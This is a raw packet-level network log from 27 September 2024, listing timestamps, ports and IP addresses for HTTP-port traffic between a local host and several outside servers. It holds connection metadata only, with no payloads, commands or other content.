Sep 27, 2024 04:21:17.501827002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501868963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501897097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501909018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501919985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501930952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501943111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501952887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501955032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501965046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501976013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501986980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501996994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502007008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502010107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502024889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502037048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502039909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502043009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502051115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502062082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502070904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502074957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502093077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502094030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502105951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502116919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502120018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502129078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502140999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502151012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502156973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502162933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502173901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502182961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502192974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502202988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502203941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502216101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502227068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502234936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502239943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502247095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.502253056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502263069 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502280951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502300978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502871037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502882004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502892017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502903938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502914906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502919912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502927065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502938032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502943993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502949953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.502955914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502962112 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.502974033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.502983093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.502985001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.502998114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503014088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503019094 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.503026009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503037930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503047943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503056049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503056049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.503060102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503074884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.503086090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503097057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503106117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503106117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.503115892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503127098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503137112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503148079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503155947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.503158092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503159046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503170967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503181934 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503184080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503195047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503196001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503209114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503218889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503220081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503230095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503241062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503241062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503252983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503262997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503273010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503278017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503304005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503320932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503761053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503772974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503838062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503849030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503859043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503863096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503870964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503880978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503891945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503892899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503905058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503914118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503925085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503925085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503937006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503950119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503952026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503961086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503973961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503983021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.503983974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.503995895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504007101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504007101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504019022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504029989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504030943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504041910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504057884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504064083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504086018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504112005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504281044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504293919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504303932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504316092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504327059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504333973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504338980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504349947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504354000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504362106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504395008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504406929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504421949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504434109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504443884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504455090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504465103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504465103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504477024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504487991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504498005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504503965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504509926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504520893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504524946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504532099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504544020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504549980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504555941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504574060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504585028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504592896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504596949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504609108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504618883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504626989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504628897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504641056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504652023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504662037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504671097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504671097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504683971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504699945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504700899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504714012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504724026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504724979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504736900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.504749060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.504780054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.505309105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.505326986 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505337000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505346060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505357027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505367994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505378962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505389929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505393982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.505400896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.505400896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505414963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.505426884 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:17.505434990 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505436897 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505450010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505454063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.505462885 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505474091 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505484104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505490065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.505495071 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505495071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505506039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505517960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505528927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505533934 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505539894 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505578995 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505578995 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505736113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505747080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505757093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505768061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505779028 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505786896 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505790949 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505801916 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505812883 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505821943 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505824089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505846977 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505882025 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505892992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505903959 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505913973 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505924940 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505935907 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505942106 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505947113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505958080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505969048 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505975962 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505975962 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.505979061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.505990028 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506000042 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506010056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506021976 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506031036 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506031036 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506040096 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506042957 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506052017 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506068945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506072998 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506079912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506091118 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506100893 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506112099 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506123066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506134033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506139994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506139994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506143093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506153107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506164074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506167889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.506176949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506189108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506198883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.506201982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.506212950 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506223917 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506223917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506226063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.506237030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506247044 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506248951 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.506254911 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506258011 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506284952 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506432056 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506710052 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506721020 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506731987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506742954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506752968 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506763935 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506774902 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506782055 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506786108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506797075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506808043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506820917 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506822109 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506844044 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506855965 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506887913 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506887913 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.506979942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.506990910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507002115 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507014036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507025003 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507035971 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507045031 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507045031 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507045984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507057905 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507070065 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507081032 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507087946 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507087946 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507091045 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507107973 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507118940 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507131100 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507134914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507141113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507152081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507162094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507162094 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507172108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507183075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507194042 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507199049 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507199049 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507205963 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507215977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.507226944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507240057 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507240057 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507242918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507255077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507268906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507272959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507286072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507287025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507297993 CEST	80	49725	185.215.113.117	192.168.2.5
